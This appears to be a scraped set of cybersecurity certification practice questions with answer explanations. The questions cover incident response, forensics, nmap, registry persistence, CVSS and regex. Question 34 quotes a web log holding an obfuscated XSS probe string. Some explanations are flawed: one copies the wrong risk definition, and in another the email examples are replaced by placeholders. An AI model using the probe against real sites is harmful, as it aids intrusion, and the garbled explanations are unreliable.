OBJ-4.2: Isolation of Connor’s computer by deactivating the port on the switch should be performed instead of just unplugging the computer. This would guarantee that Connor won’t just plug the computer back into the network as soon as you leave his desk. While Connor won’t be able to work without his workstation, it is essential to isolate the issue quickly to prevent future attempts at lateral movement from occurring and protect the company’s data needed for continued business operations. While we are unsure of the issue’s initial root cause, we know it is currently isolated to Connor’s machine. He should receive remedial cybersecurity training, his workstation’s hard drive forensically imaged for later analysis, and then his workstation should be remediated or reimaged. It is better to isolate just Connor’s machine instead of the entire network segment in this scenario. Isolating the network segment, without evidence indicating the need to do so, would have been overkill and overly disruptive to the business. Reimaging Connor’s device may destroy data that could have otherwise been recovered and led to a successful root cause analysis. There is also insufficient evidence in this scenario to warrant disciplinary action against Connor, as he may have clicked on a malicious link by mistake.
Question 17 of 60
17. Question
Which term defines the collection of all points from which an adversary could interact with a system and cause it to function in a way other than how it was designed?
Correct
OBJ-1.2: The collection of all points from which an adversary may attack is considered the attack surface. The attack vector represents the specific points an adversary has chosen for a particular attack. The threat model defines the behavior of the adversary. An adversary capability set is the list of items an adversary can use to conduct their attack.
Incorrect
OBJ-1.2: The collection of all points from which an adversary may attack is considered the attack surface. The attack vector represents the specific points an adversary has chosen for a particular attack. The threat model defines the behavior of the adversary. An adversary capability set is the list of items an adversary can use to conduct their attack.
Unattempted
OBJ-1.2: The collection of all points from which an adversary may attack is considered the attack surface. The attack vector represents the specific points an adversary has chosen for a particular attack. The threat model defines the behavior of the adversary. An adversary capability set is the list of items an adversary can use to conduct their attack.
Question 18 of 60
18. Question
Which of the following is the most difficult to confirm with an external vulnerability scan?
Correct
OBJ-1.3: Vulnerability scanners typically cannot confirm that a blind SQL injection with the execution of code has previously occurred. XSS and CSRF/XSRF are typically easier to detect because the scanner can pick up information that proves a successful attack. The banner information can usually identify unpatched servers.
Incorrect
OBJ-1.3: Vulnerability scanners typically cannot confirm that a blind SQL injection with the execution of code has previously occurred. XSS and CSRF/XSRF are typically easier to detect because the scanner can pick up information that proves a successful attack. The banner information can usually identify unpatched servers.
Unattempted
OBJ-1.3: Vulnerability scanners typically cannot confirm that a blind SQL injection with the execution of code has previously occurred. XSS and CSRF/XSRF are typically easier to detect because the scanner can pick up information that proves a successful attack. The banner information can usually identify unpatched servers.
Question 19 of 60
19. Question
What information should be recorded on a chain of custody form during a forensic investigation?
Correct
OBJ-4.4: Chain of custody forms list every person who has worked with or who has touched the evidence that is a part of an investigation. These forms record every action taken by each individual in possession of the evidence. Depending on the organization’s procedures, manipulation of evidence may require an additional person to act as a witness to verify whatever action is being taken. While the chain of custody would record who initially collected the evidence, it does not have to record who was the first person on the scene (if that person didn’t collect the evidence). The other options presented by the question are all good pieces of information to record in your notes, but it is not required to be on the chain of custody form.
Incorrect
OBJ-4.4: Chain of custody forms list every person who has worked with or who has touched the evidence that is a part of an investigation. These forms record every action taken by each individual in possession of the evidence. Depending on the organization’s procedures, manipulation of evidence may require an additional person to act as a witness to verify whatever action is being taken. While the chain of custody would record who initially collected the evidence, it does not have to record who was the first person on the scene (if that person didn’t collect the evidence). The other options presented by the question are all good pieces of information to record in your notes, but it is not required to be on the chain of custody form.
Unattempted
OBJ-4.4: Chain of custody forms list every person who has worked with or who has touched the evidence that is a part of an investigation. These forms record every action taken by each individual in possession of the evidence. Depending on the organization’s procedures, manipulation of evidence may require an additional person to act as a witness to verify whatever action is being taken. While the chain of custody would record who initially collected the evidence, it does not have to record who was the first person on the scene (if that person didn’t collect the evidence). The other options presented by the question are all good pieces of information to record in your notes, but it is not required to be on the chain of custody form.
Question 20 of 60
20. Question
Which of the following security controls provides Windows system administrators with an efficient way to deploy system configuration settings across many devices?
Correct
OBJ-1.7: Microsoft’s Group Policy Object (GPO) is a collection of Group Policy settings that defines what a system will look like and how it will behave for a defined group of users. It allows an administrator to create a policy and deploy it across many devices in the domain or network. Patch management, host intrusion prevention systems (HIPS), and anti-malware software are different host security controls. Still, only GPOs have the ability to configure settings across multiple Windows devices efficiently.
Incorrect
OBJ-1.7: Microsoft’s Group Policy Object (GPO) is a collection of Group Policy settings that defines what a system will look like and how it will behave for a defined group of users. It allows an administrator to create a policy and deploy it across many devices in the domain or network. Patch management, host intrusion prevention systems (HIPS), and anti-malware software are different host security controls. Still, only GPOs have the ability to configure settings across multiple Windows devices efficiently.
Unattempted
OBJ-1.7: Microsoft’s Group Policy Object (GPO) is a collection of Group Policy settings that defines what a system will look like and how it will behave for a defined group of users. It allows an administrator to create a policy and deploy it across many devices in the domain or network. Patch management, host intrusion prevention systems (HIPS), and anti-malware software are different host security controls. Still, only GPOs have the ability to configure settings across multiple Windows devices efficiently.
Question 21 of 60
21. Question
Which of the following techniques listed below are not appropriate to use during a passive reconnaissance exercise against a specific target company?
Correct
OBJ-1.1: Banner grabbing requires a connection to the host to grab the banner successfully. This is an active reconnaissance activity. All other options are considered passive processes and typically use information retrieved from third-parties that do not directly connect to an organization’s remote host.
Incorrect
OBJ-1.1: Banner grabbing requires a connection to the host to grab the banner successfully. This is an active reconnaissance activity. All other options are considered passive processes and typically use information retrieved from third-parties that do not directly connect to an organization’s remote host.
Unattempted
OBJ-1.1: Banner grabbing requires a connection to the host to grab the banner successfully. This is an active reconnaissance activity. All other options are considered passive processes and typically use information retrieved from third-parties that do not directly connect to an organization’s remote host.
Question 22 of 60
22. Question
If you want to conduct an operating system identification during a nmap scan, which syntax should you utilize?
Correct
OBJ-1.4: The -O flag indicates to nmap that it should attempt to identify the target’s operating system during the scanning process. It does this by evaluating the responses it received during the scan against its signature database for each operating system.
Incorrect
OBJ-1.4: The -O flag indicates to nmap that it should attempt to identify the target’s operating system during the scanning process. It does this by evaluating the responses it received during the scan against its signature database for each operating system.
Unattempted
OBJ-1.4: The -O flag indicates to nmap that it should attempt to identify the target’s operating system during the scanning process. It does this by evaluating the responses it received during the scan against its signature database for each operating system.
Question 23 of 60
23. Question
Shawn needs to boot a system to remediate it. The system was compromised by an attack and had a malicious program installed by creating a RunOnce key in the registry. What can Shawn do to boot the computer and prevent the RunOnce from executing the malicious program listed in the registry key?
Correct
OBJ-4.2: When booting in Safe Mode, Run and RunOnce are ignored by the Windows system. The Registry’s autorun entries are often targeted because they’re not always visible to the average user. In modern Windows systems, there are two types of autorun keys: Run, which initializes its values asynchronously, and RunOnce, which initializes its values in order. By default, these keys are ignored when the computer is started in Safe Mode. The value name of RunOnce keys can be prefixed with an asterisk (*) to force the program to run even in Safe mode.
Incorrect
OBJ-4.2: When booting in Safe Mode, Run and RunOnce are ignored by the Windows system. The Registry’s autorun entries are often targeted because they’re not always visible to the average user. In modern Windows systems, there are two types of autorun keys: Run, which initializes its values asynchronously, and RunOnce, which initializes its values in order. By default, these keys are ignored when the computer is started in Safe Mode. The value name of RunOnce keys can be prefixed with an asterisk (*) to force the program to run even in Safe mode.
Unattempted
OBJ-4.2: When booting in Safe Mode, Run and RunOnce are ignored by the Windows system. The Registry’s autorun entries are often targeted because they’re not always visible to the average user. In modern Windows systems, there are two types of autorun keys: Run, which initializes its values asynchronously, and RunOnce, which initializes its values in order. By default, these keys are ignored when the computer is started in Safe Mode. The value name of RunOnce keys can be prefixed with an asterisk (*) to force the program to run even in Safe mode.
Question 24 of 60
24. Question
What is the term for the amount of risk that an organization is willing to accept or tolerate?
Correct
OBJ-5.2: An organization’s willingness to tolerate risk is known as its risk appetite. If you determine that you have a greater risk appetite for a certain system or function of the business, you may choose to scan less it frequently, for example. If you have a low-risk appetite, you will place a higher amount of resources towards defending and mitigating your systems. Risk avoidance is the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario. Risk deterrence is the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario. Risk transference moves or shares the responsibility of risk to another entity.
Incorrect
OBJ-5.2: An organization’s willingness to tolerate risk is known as its risk appetite. If you determine that you have a greater risk appetite for a certain system or function of the business, you may choose to scan less it frequently, for example. If you have a low-risk appetite, you will place a higher amount of resources towards defending and mitigating your systems. Risk avoidance is the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario. Risk deterrence is the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario. Risk transference moves or shares the responsibility of risk to another entity.
Unattempted
OBJ-5.2: An organization’s willingness to tolerate risk is known as its risk appetite. If you determine that you have a greater risk appetite for a certain system or function of the business, you may choose to scan less it frequently, for example. If you have a low-risk appetite, you will place a higher amount of resources towards defending and mitigating your systems. Risk avoidance is the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario. Risk deterrence is the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario. Risk transference moves or shares the responsibility of risk to another entity.
Question 25 of 60
25. Question
Which of the following methods could not be used to retrieve the key from a forensic copy of a BitLocker encrypted drive?
Correct
OBJ-4.4: BitLocker information is not stored in the Master Boot Record (MBR). Therefore, you cannot retrieve the key from the MBR. BitLocker keys can also be retrieved via hibernation files or memory dumps. The recovery key may also be retrieved by conducting a FireWire attack on the mounted drive using a side-channel attack known as a DMA attack. This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal is not to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!
Incorrect
OBJ-4.4: BitLocker information is not stored in the Master Boot Record (MBR). Therefore, you cannot retrieve the key from the MBR. BitLocker keys can also be retrieved via hibernation files or memory dumps. The recovery key may also be retrieved by conducting a FireWire attack on the mounted drive using a side-channel attack known as a DMA attack. This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal is not to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!
Unattempted
OBJ-4.4: BitLocker information is not stored in the Master Boot Record (MBR). Therefore, you cannot retrieve the key from the MBR. BitLocker keys can also be retrieved via hibernation files or memory dumps. The recovery key may also be retrieved by conducting a FireWire attack on the mounted drive using a side-channel attack known as a DMA attack. This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal is not to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!
Question 26 of 60
26. Question
Which of the following would be used to prevent a firmware downgrade?
Correct
OBJ-4.2: eFUSE is an Intel-designed mechanism to allow software instructions to blow a transistor in the hardware chip. One use of this is to prevent firmware downgrades, implemented on some game consoles and smartphones. Each time the firmware is upgraded, the updater blows an eFUSE. When there is a firmware update, the updater checks that the number of blown eFUSEs is not less than the firmware version number. A self-encrypting drive (SED) uses cryptographic operations performed by the drive controller to encrypt a storage device’s contents. A trusted platform module (TPM) is a specification for hardware-based storage of digital certificates, cryptographic keys, hashed passwords, and other user and platform identification information. The TPM is implemented either as part of the chipset or as an embedded function of the CPU. A hardware security module (HSM) is an appliance for generating and storing cryptographic keys. An HSM solution may be less susceptible to tampering and insider threats than software-based storage.
Incorrect
OBJ-4.2: eFUSE is an Intel-designed mechanism to allow software instructions to blow a transistor in the hardware chip. One use of this is to prevent firmware downgrades, implemented on some game consoles and smartphones. Each time the firmware is upgraded, the updater blows an eFUSE. When there is a firmware update, the updater checks that the number of blown eFUSEs is not less than the firmware version number. A self-encrypting drive (SED) uses cryptographic operations performed by the drive controller to encrypt a storage device’s contents. A trusted platform module (TPM) is a specification for hardware-based storage of digital certificates, cryptographic keys, hashed passwords, and other user and platform identification information. The TPM is implemented either as part of the chipset or as an embedded function of the CPU. A hardware security module (HSM) is an appliance for generating and storing cryptographic keys. An HSM solution may be less susceptible to tampering and insider threats than software-based storage.
Unattempted
OBJ-4.2: eFUSE is an Intel-designed mechanism to allow software instructions to blow a transistor in the hardware chip. One use of this is to prevent firmware downgrades, implemented on some game consoles and smartphones. Each time the firmware is upgraded, the updater blows an eFUSE. When there is a firmware update, the updater checks that the number of blown eFUSEs is not less than the firmware version number. A self-encrypting drive (SED) uses cryptographic operations performed by the drive controller to encrypt a storage device’s contents. A trusted platform module (TPM) is a specification for hardware-based storage of digital certificates, cryptographic keys, hashed passwords, and other user and platform identification information. The TPM is implemented either as part of the chipset or as an embedded function of the CPU. A hardware security module (HSM) is an appliance for generating and storing cryptographic keys. An HSM solution may be less susceptible to tampering and insider threats than software-based storage.
Question 27 of 60
27. Question
You were interpreting a Nessus vulnerability scan report and identified a vulnerability in the system with a CVSS attack vector rating of A. Based on this information, which of the following statements would be true?
Correct
OBJ-1.4: The attack vector explains what type of access that the attacker must have to a system or network and does not refer to the types of specialized conditions that must exist. In this case, the A rating refers to Adjacent, where the attacker must launch the attack from the same shared physical (such as Bluetooth or Wi-Fi network), logical network (such as a local subnet), or a limited administrative domain (such as a VPN or MPLS). An attack vector of Network (N) would allow the attack to extend beyond these options and conduct remote exploitation of the vulnerability. An attack vector of Local (L) would require the attacker to locally exploit the workstation via the keyboard or over an SSH connection. An attack vector of Physical (P) would require the attacker to physically touch or manipulate the vulnerable component themselves, such as conducting a cold boot attack.
Incorrect
OBJ-1.4: The attack vector explains what type of access that the attacker must have to a system or network and does not refer to the types of specialized conditions that must exist. In this case, the A rating refers to Adjacent, where the attacker must launch the attack from the same shared physical (such as Bluetooth or Wi-Fi network), logical network (such as a local subnet), or a limited administrative domain (such as a VPN or MPLS). An attack vector of Network (N) would allow the attack to extend beyond these options and conduct remote exploitation of the vulnerability. An attack vector of Local (L) would require the attacker to locally exploit the workstation via the keyboard or over an SSH connection. An attack vector of Physical (P) would require the attacker to physically touch or manipulate the vulnerable component themselves, such as conducting a cold boot attack.
Unattempted
OBJ-1.4: The attack vector explains what type of access that the attacker must have to a system or network and does not refer to the types of specialized conditions that must exist. In this case, the A rating refers to Adjacent, where the attacker must launch the attack from the same shared physical (such as Bluetooth or Wi-Fi network), logical network (such as a local subnet), or a limited administrative domain (such as a VPN or MPLS). An attack vector of Network (N) would allow the attack to extend beyond these options and conduct remote exploitation of the vulnerability. An attack vector of Local (L) would require the attacker to locally exploit the workstation via the keyboard or over an SSH connection. An attack vector of Physical (P) would require the attacker to physically touch or manipulate the vulnerable component themselves, such as conducting a cold boot attack.
Question 28 of 60
28. Question
Which of the following is NOT a means of improving data validation and trust?
Correct
OBJ-3.2: Encrypting data in transit leads to more integrity and confidentiality of the data, and therefore trust. Hashing files using MD5 to check against known valid checksums would provide integrity, and therefore validation and trust. Implementing a file integrity monitoring program, such as Tripwire, would also improve data validation and trust. Decrypting data at rest does not improve data validation, or trust since the data at rest could be modified when decrypted.
Incorrect
OBJ-3.2: Encrypting data in transit leads to more integrity and confidentiality of the data, and therefore trust. Hashing files using MD5 to check against known valid checksums would provide integrity, and therefore validation and trust. Implementing a file integrity monitoring program, such as Tripwire, would also improve data validation and trust. Decrypting data at rest does not improve data validation, or trust since the data at rest could be modified when decrypted.
Unattempted
OBJ-3.2: Encrypting data in transit leads to more integrity and confidentiality of the data, and therefore trust. Hashing files using MD5 to check against known valid checksums would provide integrity, and therefore validation and trust. Implementing a file integrity monitoring program, such as Tripwire, would also improve data validation and trust. Decrypting data at rest does not improve data validation, or trust since the data at rest could be modified when decrypted.
Question 29 of 60
29. Question
In which phase of the security intelligence cycle is published information relevant to security issues provided to those who need to act on that information?
Correct
OBJ-1.2: The dissemination phase refers to publishing information produced by analysis to consumers who need to develop the insights. The collection phase is usually implemented by administrators using various software suites, such as security information and event management (SIEM). This software must be configured with connectors or agents that can retrieve data from sources such as firewalls, routers, IDS sensors, and servers. The analysis phase focuses on converting collected data into useful information or actionable intelligence. The final phase of the security intelligence cycle is feedback and review, which utilizes both intelligence producers and intelligence consumers’ input. This phase aims to improve the implementation of the requirements, collection, analysis, and dissemination phases as the life cycle is developed.
Incorrect
OBJ-1.2: The dissemination phase refers to publishing information produced by analysis to consumers who need to develop the insights. The collection phase is usually implemented by administrators using various software suites, such as security information and event management (SIEM). This software must be configured with connectors or agents that can retrieve data from sources such as firewalls, routers, IDS sensors, and servers. The analysis phase focuses on converting collected data into useful information or actionable intelligence. The final phase of the security intelligence cycle is feedback and review, which utilizes both intelligence producers and intelligence consumers’ input. This phase aims to improve the implementation of the requirements, collection, analysis, and dissemination phases as the life cycle is developed.
Unattempted
OBJ-1.2: The dissemination phase refers to publishing information produced by analysis to consumers who need to develop the insights. The collection phase is usually implemented by administrators using various software suites, such as security information and event management (SIEM). This software must be configured with connectors or agents that can retrieve data from sources such as firewalls, routers, IDS sensors, and servers. The analysis phase focuses on converting collected data into useful information or actionable intelligence. The final phase of the security intelligence cycle is feedback and review, which utilizes both intelligence producers and intelligence consumers’ input. This phase aims to improve the implementation of the requirements, collection, analysis, and dissemination phases as the life cycle is developed.
Question 30 of 60
30. Question
Nicole’s organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role?
Correct
OBJ-2.1: A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings. Security as a service or a managed service provider (MSP) would be better suited for this role. This question may seem beyond the exam scope. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!
Incorrect
OBJ-2.1: A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings. Security as a service or a managed service provider (MSP) would be better suited for this role. This question may seem beyond the exam scope. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!
Unattempted
OBJ-2.1: A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings. Security as a service or a managed service provider (MSP) would be better suited for this role. This question may seem beyond the exam scope. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!
Question 31 of 60
31. Question
You identified a critical vulnerability in one of your organization’s databases. You researched a solution, but it will require the server to be taken offline during the patch installation. You have received permission from the Change Advisory Board to implement this emergency change at 11 pm once everyone has left the office. It is now 3 pm; what action(s) should you take now to best prepare for implementing this evening’s change? (SELECT ALL THAT APPLY)
Correct
OBJ-2.1: You should send out a notification to the key stakeholders to ensure they are notified of the planned outage this evening. You should test and validate the patch in a staging environment before installing it on the production server. You should identify any potential risks associated with installing this patch. You should also document the change in the change management system. You should not take the server offline before your change window begins at 11 pm, which could affect users who are relying on the system. You should not take this opportunity to install any additional software, features, or patches unless you have received approval from the Change Advisory Board (CAB).
Incorrect
OBJ-2.1: You should send out a notification to the key stakeholders to ensure they are notified of the planned outage this evening. You should test and validate the patch in a staging environment before installing it on the production server. You should identify any potential risks associated with installing this patch. You should also document the change in the change management system. You should not take the server offline before your change window begins at 11 pm, which could affect users who are relying on the system. You should not take this opportunity to install any additional software, features, or patches unless you have received approval from the Change Advisory Board (CAB).
Unattempted
OBJ-2.1: You should send out a notification to the key stakeholders to ensure they are notified of the planned outage this evening. You should test and validate the patch in a staging environment before installing it on the production server. You should identify any potential risks associated with installing this patch. You should also document the change in the change management system. You should not take the server offline before your change window begins at 11 pm, which could affect users who are relying on the system. You should not take this opportunity to install any additional software, features, or patches unless you have received approval from the Change Advisory Board (CAB).
Question 32 of 60
32. Question
You are reverse engineering a piece of malware recovered from a retailer’s network for analysis. They found that the malicious code was extracting track data from their customer’s credit cards during processing. Which of the following types of threats would you classify this malware as?
Correct
OBJ-4.4: Point-of-sale malware (POS malware) is usually a type of malicious software (malware) that is used by cybercriminals to target point of sale (POS) and payment terminals with the intent to obtain credit card and debit card information, a card’s track 1 or track 2 data and even the CVV code, by various man-in-the-middle attacks, that is the interception of the processing at the retail checkout point of sale system. Ransomware is a type of malware that threatens to publish the victim’s data or perpetually block access to it unless a ransom is paid. Keyloggers are a type of monitoring software designed to record keystrokes made by a user. These keyloggers can record the information you type into a website or application and send to back to an attacker. A rootkit is a malware class that modifies system files, often at the kernel level, to conceal its presence.
Incorrect
OBJ-4.4: Point-of-sale malware (POS malware) is usually a type of malicious software (malware) that is used by cybercriminals to target point of sale (POS) and payment terminals with the intent to obtain credit card and debit card information, a card’s track 1 or track 2 data and even the CVV code, by various man-in-the-middle attacks, that is the interception of the processing at the retail checkout point of sale system. Ransomware is a type of malware that threatens to publish the victim’s data or perpetually block access to it unless a ransom is paid. Keyloggers are a type of monitoring software designed to record keystrokes made by a user. These keyloggers can record the information you type into a website or application and send to back to an attacker. A rootkit is a malware class that modifies system files, often at the kernel level, to conceal its presence.
Unattempted
OBJ-4.4: Point-of-sale malware (POS malware) is usually a type of malicious software (malware) that is used by cybercriminals to target point of sale (POS) and payment terminals with the intent to obtain credit card and debit card information, a card’s track 1 or track 2 data and even the CVV code, by various man-in-the-middle attacks, that is the interception of the processing at the retail checkout point of sale system. Ransomware is a type of malware that threatens to publish the victim’s data or perpetually block access to it unless a ransom is paid. Keyloggers are a type of monitoring software designed to record keystrokes made by a user. These keyloggers can record the information you type into a website or application and send to back to an attacker. A rootkit is a malware class that modifies system files, often at the kernel level, to conceal its presence.
Question 33 of 60
33. Question
Which of the following lists represents the NIST cybersecurity framework’s four tiers, when ordered from least mature to most mature?
Correct
OBJ-5.3: From least mature to most mature, the NIST cybersecurity framework is Partial (tier 1), Risk Informed (tier 2), Repeatable (tier 3), and Adaptive (tier 4). This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!
Incorrect
OBJ-5.3: From least mature to most mature, the NIST cybersecurity framework is Partial (tier 1), Risk Informed (tier 2), Repeatable (tier 3), and Adaptive (tier 4). This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!
Unattempted
OBJ-5.3: From least mature to most mature, the NIST cybersecurity framework is Partial (tier 1), Risk Informed (tier 2), Repeatable (tier 3), and Adaptive (tier 4). This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!
Question 34 of 60
34. Question
You are analyzing the logs of a web server and see the following entry:
-=-=-=-=-=–=-=-=-=-=–=-=-=-=-=-
192.168.1.25 – – [05/Aug/2020:15:16:42 -0400] “GET /%27%27;!–%22%3CSKILLCERTPRO%3E=&{()
} HTTP/1.1? 404 310 “-” “Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12)
Gecko/2009070812 Ubuntu/19.04 (disco dingo) Firefox/3.0.12?
-=-=-=-=-=–=-=-=-=-=–=-=-=-=-=-
Based on this entry, which of the following attacks was attempted?
Correct
OBJ-1.7: This is an example of an XSS attack as recorded by a web server’s log. In this example, the XSS attack was obfuscated by the attacker using HTML encoding. The encoding of %27%27 translates to two single quote marks (‘ ‘). While you don’t need to be able to decode the exact string used in the logs, when you see HTML encoding on the exam, it is usually going to be an XSS attack unless you see SQL or XML statements in the string, which in this case there are neither of those. Cross-site scripting (XSS) attacks use a specially crafted URL that includes attack code that will cause user information entered into their web browser to be sent to the attacker. An attacker finds a web server vulnerable to XSS and sends a legitimate-looking URL with XSS attack code appended to the end of the URL through a phishing email or other message to trick the user into clicking the link. A buffer overflow attempts to write data to a buffer that overruns the buffer’s boundary and writes data into the adjacent memory locations, which is not occurring in this example.
Incorrect
OBJ-1.7: This is an example of an XSS attack as recorded by a web server’s log. In this example, the XSS attack was obfuscated by the attacker using HTML encoding. The encoding of %27%27 translates to two single quote marks (‘ ‘). While you don’t need to be able to decode the exact string used in the logs, when you see HTML encoding on the exam, it is usually going to be an XSS attack unless you see SQL or XML statements in the string, which in this case there are neither of those. Cross-site scripting (XSS) attacks use a specially crafted URL that includes attack code that will cause user information entered into their web browser to be sent to the attacker. An attacker finds a web server vulnerable to XSS and sends a legitimate-looking URL with XSS attack code appended to the end of the URL through a phishing email or other message to trick the user into clicking the link. A buffer overflow attempts to write data to a buffer that overruns the buffer’s boundary and writes data into the adjacent memory locations, which is not occurring in this example.
Unattempted
OBJ-1.7: This is an example of an XSS attack as recorded by a web server’s log. In this example, the XSS attack was obfuscated by the attacker using HTML encoding. The encoding of %27%27 translates to two single quote marks (‘ ‘). While you don’t need to be able to decode the exact string used in the logs, when you see HTML encoding on the exam, it is usually going to be an XSS attack unless you see SQL or XML statements in the string, which in this case there are neither of those. Cross-site scripting (XSS) attacks use a specially crafted URL that includes attack code that will cause user information entered into their web browser to be sent to the attacker. An attacker finds a web server vulnerable to XSS and sends a legitimate-looking URL with XSS attack code appended to the end of the URL through a phishing email or other message to trick the user into clicking the link. A buffer overflow attempts to write data to a buffer that overruns the buffer’s boundary and writes data into the adjacent memory locations, which is not occurring in this example.
Question 35 of 60
35. Question
You are conducting a grep search on a log file using the following REGEX expression:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
\b[A-Za-z0-9_%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Which of the following strings would be included in the output of the search?
Correct
OBJ-3.1: In the above REGEX, the \b parameter identifies that we are looking for whole words. The strategic use of the + operator indicates the three places where the word is broken into parts. The first part ([A-Za-z0-9_%+-]” is composed of upper or lower case alphanumeric symbols “_%+-.” After the first part of the word and the at sign (@) is specified, follows by another word ([A-Za-z0-9.-]), a period (\.), and another purely alphabetic (non-numeric) string that is 2-6 characters in length. This finds a standard email format of [email protected] (but could be @something.co, @something.org, @something.money, or other options as long as the top-level domain is between 2 and 6 characters). The option of http://www.diontraining.com is wrong because it does not have an @ sign in the string. The option of [email protected] is wrong because you cannot use a period before the @ symbol, only letters, numbers, and some specified symbols ( _ % + – ). The option of [email protected] is wrong because the last word (training) is longer than 6 characters in length. As a cybersecurity analyst, you must get comfortable creating regular expressions and understanding what type of output they generate.
Incorrect
OBJ-3.1: In the above REGEX, the \b parameter identifies that we are looking for whole words. The strategic use of the + operator indicates the three places where the word is broken into parts. The first part ([A-Za-z0-9_%+-]” is composed of upper or lower case alphanumeric symbols “_%+-.” After the first part of the word and the at sign (@) is specified, follows by another word ([A-Za-z0-9.-]), a period (\.), and another purely alphabetic (non-numeric) string that is 2-6 characters in length. This finds a standard email format of [email protected] (but could be @something.co, @something.org, @something.money, or other options as long as the top-level domain is between 2 and 6 characters). The option of http://www.diontraining.com is wrong because it does not have an @ sign in the string. The option of [email protected] is wrong because you cannot use a period before the @ symbol, only letters, numbers, and some specified symbols ( _ % + – ). The option of [email protected] is wrong because the last word (training) is longer than 6 characters in length. As a cybersecurity analyst, you must get comfortable creating regular expressions and understanding what type of output they generate.
Unattempted
